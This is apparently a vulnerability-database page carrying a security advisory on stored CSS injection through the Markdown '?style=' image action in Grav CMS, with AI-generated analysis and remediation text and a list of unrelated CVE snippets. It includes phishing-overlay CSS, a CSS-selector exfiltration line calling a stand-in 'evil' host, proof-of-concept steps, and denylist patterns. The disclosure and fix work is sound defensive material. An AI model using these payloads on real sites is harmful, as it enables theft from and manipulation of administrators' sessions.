Severity by source
AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
PR:H for required editor account; UI:R because a privileged admin must view the page; S:C as editor content crosses into the admin trust context; C:L/I:L for CSS exfiltration and UI manipulation without full script execution.
Primary rating from Vendor (https://github.com/getgrav/grav).
CVSS VectorVendor: https://github.com/getgrav/grav
Lifecycle Timeline
2DescriptionCVE.org
Summary
The fix for GHSA-r7fx-8g49-7hhr / CVE-2026-42841 (Stored XSS via Markdown media attribute() action) is incomplete. The maintainer patched MediaObjectTrait::attribute() to deny dangerous attribute names (event handlers, style, xmlns, srcdoc, formaction) but the sibling MediaObjectTrait::style() method is reachable through the same Markdown excerpt-action pipeline and writes editor-controlled strings straight into the rendered <img style="…"> attribute with no sanitization.
Any user with admin.pages permission (e.g. an editor) can save Markdown like:
which renders to a stored-CSS payload that any higher-privileged viewer (administrator, super-admin, reviewer) loads in their authenticated session. Same trust boundary, same victim, same attacker, same Markdown input vector as the patched GHSA-r7fx-8g49-7hhr issue - the fix simply patched the attribute() entry point and missed the style() sibling.
Affected versions
Vulnerable at HEAD across every currently-shipping branch (verified 2026-06-15):
| Branch / tag | MediaObjectTrait::style() |
|---|---|
develop (f4c0f42) | unpatched |
2.0 (96e1d2d) | unpatched |
2.0.0-rc.8 (latest 2.0 RC tag) | unpatched |
1.7.52 (latest 1.7 stable) | unpatched |
Per SECURITY.md, this advisory targets the 2.0 line (publisher-level exploit, not eligible for 1.7 backport per the project's stated policy).
Trust boundary
Per the project's SECURITY.md:
> A vulnerability is when an actor can escape the trust scope of their role: a publisher whose stored content compromises an admin session, an unauthenticated visitor who reaches a privileged sink, an account at any tier that gains capabilities it was not granted.
An editor authoring Markdown is operating within their role. A higher-privilege admin loading that editor's page in their authenticated session and getting attacker-controlled CSS painted into their browser is across the trust boundary - the same framing that was accepted for GHSA-r7fx-8g49-7hhr (MODERATE) and GHSA-c2q3-p4jr-c55f (MODERATE).
Details
Original GHSA-r7fx-8g49-7hhr fix (commit 5a12f9be8, 2026-04-23)
public function attribute($attribute = null, $value = '')
{
if (empty($attribute) || !is_string($attribute)) {
return $this;
}
if (!self::isSafeAttributeName($attribute)) {
return $this;
}
$this->attributes[$attribute] = $value;
return $this;
}
private static function isSafeAttributeName(string $name): bool
{
if (!preg_match('/^[A-Za-z][A-Za-z0-9_:.\-]*$/', $name)) {
return false;
}
$lower = strtolower($name);
if (str_starts_with($lower, 'on')) { // event handlers
return false;
}
$denylist = ['style', 'xmlns', 'srcdoc', 'formaction'];
return !in_array($lower, $denylist, true);
}style is the second-named entry on the denylist - the maintainer explicitly recognised that editor-supplied style was dangerous when arriving via the attribute() action. The fix simply didn't reach the parallel sink.
The unpatched sibling: MediaObjectTrait::style() (line 519)
/**
* Allows to add an inline style attribute from Markdown or Twig
* Example: 
*/
public function style($style)
{
$this->styleAttributes[] = rtrim($style, ';') . ';';
return $this;
}The function is unchanged before, during, and after the GHSA-r7fx-8g49-7hhr fix. The PHPDoc on the very next line names the Markdown invocation form (?style=…). The rtrim is for clean concatenation, not security.
$styleAttributes is concatenated and assigned to attributes['style'] in parsedownElement() (lines 242-251):
$style = '';
foreach ($this->styleAttributes as $key => $value) {
if (is_numeric($key)) { // editor-supplied entries are numeric-keyed
$style .= $value;
} else {
$style .= $key . ': ' . $value . ';';
}
}
if ($style) {
$attributes['style'] = $style;
}Parsedown then runs htmlspecialchars on the value (so quote-breakout into a new attribute is blocked), but arbitrary CSS as the value is enough.
Source → sink trace
The Markdown processor wires query-string keys to method calls on the Medium object (system/src/Grav/Common/Page/Markdown/Excerpts.php:262):
foreach ($actions as $action) {
$matches = [];
if (preg_match('/\[(.*)\]/', (string) $action['params'], $matches)) {
$args = [explode(',', $matches[1])];
} else {
$args = explode(',', (string) $action['params']);
}
$medium = call_user_func_array([$medium, $action['method']], $args);
}?style=position:fixed;top:0;left:0 becomes $medium->style('position:fixed;top:0;left:0').
Save-side XSS detector misses the payload
AdminController::savePage() runs Security::detectXssFromArray() on data[content] before persisting (classes/plugin/AdminController.php:1402). All five default patterns miss the Markdown form:
on_events: requires<…on*=in source.invalid_protocols: requiresjavascript:/data:/etc. - the phishing-overlay payload uses none.moz_binding: requires-moz-binding:literally.html_inline_styles: requires<…style=…(url:|x:expression); Markdown source has no<and nourl:.dangerous_tags: requires<svg/<script/etc.
Save proceeds, the payload persists, the CSS is rendered to every viewer.
Impact
- Phishing overlay - full-viewport
position:fixedcovering the admin UI with attacker-controlled background/content; admin clicks intended actions into the attacker's overlay. - UI redress / clickjacking - invisible overlays hijacking admin button clicks.
- CSS-selector data exfiltration -
input[value^="a"] { background: url(//evil/log?c=a) }against form fields the higher-privileged viewer interacts with. - Persistent admin-UI denial-of-service -
position:fixed; background:whitecovers the page until the offending content is removed by hand on the server.
The stored payload reaches every user who views the editor's page - including administrators previewing pending changes.
Proof of concept
A deterministic end-to-end PoC against a real Grav install ships with the finding (repro.sh). Steps:
- Log in as an editor (
admin.pages+admin.pages.update, noadmin.super). - Upload a benign image to a target page.
- Save the page with the Markdown payload
. - Visit the public page; observe the
<img style="…">carrying the unsanitised CSS.
Suggested fix
Apply the same denylist + identifier-shape gate to style() that isSafeAttributeName() enforces for attribute():
public function style($style)
{
+ if (!is_string($style) || !self::isSafeStyleValue($style)) {
+ return $this;
+ }
$this->styleAttributes[] = rtrim($style, ';') . ';';
return $this;
}
+/**
+ * Editor-controlled style values arrive via Markdown `?style=…` and reach
+ * the rendered `<img style="…">` attribute verbatim. Limit to a conservative
+ * set of CSS that themes legitimately use from content (sizing, float,
+ * margin, etc.) and reject anything that opens a phishing-overlay or
+ * data-exfil primitive. Matches the spirit of the attribute() denylist
+ * from GHSA-r7fx-8g49-7hhr - same trust boundary, sibling sink.
+ */
+private static function isSafeStyleValue(string $css): bool
+{
+ $css = strtolower($css);
+ // Deny: phishing-overlay positioning, CSS-selector exfil sinks
+ // (background/content url(...)), expression() (legacy IE),
+ // -moz-binding (legacy FF), behavior: url() (IE).
+ $deny = ['position:', '@import', 'url(', 'expression(',
+ '-moz-binding', 'behavior:', 'z-index:', 'fixed', 'absolute'];
+ foreach ($deny as $needle) {
+ if (str_contains($css, $needle)) {
+ return false;
+ }
+ }
+ return (bool) preg_match('/^[A-Za-z0-9 :;%.,\-#\/]*$/', $css);
+}Alternatively, deprecate the Markdown ?style=… action entirely - themes can still set inline styles from PHP, but accepting attacker-controlled CSS from page content was always a footgun.
Defense in depth: extend Security::detectXss()'s html_inline_styles rule to also match Markdown-form ?style= query parameters in data[content] on save.
References
- Original advisory: GHSA-r7fx-8g49-7hhr
- Fix commit:
5a12f9be8(system/src/Grav/Common/Media/Traits/MediaObjectTrait.php) - Unpatched code:
system/src/Grav/Common/Media/Traits/MediaObjectTrait.phplines 519-524 - Project security policy:
SECURITY.md(trust-boundary severity model)
AnalysisAI
Stored CSS injection in Grav CMS's MediaObjectTrait::style() exposes an incomplete fix: the original patch for CVE-2026-42841 (GHSA-r7fx-8g49-7hhr) explicitly denylisted 'style' in the attribute() code path but left the parallel style() method-reachable via the same Markdown ?style= image query parameter pipeline-entirely unsanitized. Any editor holding admin.pages permission can save a single Markdown image reference with an arbitrary CSS payload that persists in the CMS and renders into <img style='...'> for every subsequent viewer, including administrators and super-admins in their authenticated sessions. A deterministic proof-of-concept ships with the advisory; no active exploitation (CISA KEV) has been confirmed at time of analysis.
Technical ContextAI
The vulnerability resides in system/src/Grav/Common/Media/Traits/MediaObjectTrait.php within Grav CMS (pkg:composer/getgrav/grav), a PHP flat-file CMS. Grav's Markdown processor dispatches image query-string keys to method calls on Medium objects via Excerpts.php:262 using call_user_func_array; a ?style=... parameter becomes $medium->style('...') with no input validation. The style() method (line 519) appends the editor-controlled string to $styleAttributes after only a trailing-semicolon trim, which parsedownElement() then concatenates and assigns to the rendered element's style HTML attribute. While htmlspecialchars is applied to the final value-blocking quote-breakout into new attributes-arbitrary CSS as the attribute value is sufficient for phishing overlays, CSS-selector data exfiltration, and UI redress. CWE-79 (Improper Neutralization of Input During Web Page Generation) applies: editor-controlled content traverses the Markdown pipeline to a rendered HTML attribute without sanitization. The prior fix for GHSA-r7fx-8g49-7hhr demonstrates explicit maintainer awareness that editor-supplied style values are dangerous via attribute(), yet the sibling style() entry point was not addressed. The AdminController XSS detector (AdminController.php:1402) also misses this payload because all five default patterns require angle brackets, javascript: URIs, or -moz-binding literals that are absent from the Markdown form.
RemediationAI
Upgrade Grav CMS to version 2.0.0-rc.9 or later, which contains the sanitization fix in system/src/Grav/Common/Media/Traits/MediaObjectTrait.php (patch commit 5a12f9be8, https://github.com/getgrav/grav/commit/5a12f9be8). For installations that cannot immediately upgrade, the most effective compensating control is to restrict admin.pages and admin.pages.update permissions to fully trusted users only, eliminating the editor-level trust tier that enables the attack; the trade-off is reduced editorial delegation. As a defense-in-depth measure, extend Security::detectXss()'s html_inline_styles rule to also match Markdown-form ?style= query parameters in data[content] on save, as proposed in the advisory-this adds a save-time gate without breaking the feature. Alternatively, the advisory suggests deprecating the Markdown ?style=... action entirely, confining inline-style injection to PHP/Twig template code; the trade-off is that legitimate theme-level use of inline styles from Markdown content would be removed. Organizations running 1.7.x should treat the branch as permanently unpatched for this issue and plan migration to 2.0.x.
In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 in certain configurations of FPM setup it
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not
(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear
The '/common/download_agent_installer.php' script in the Quest KACE System Management Appliance 8.0.318 is accessible by
ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C
Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au
Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c
Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-42946
GHSA-pmf8-g7c8-7v54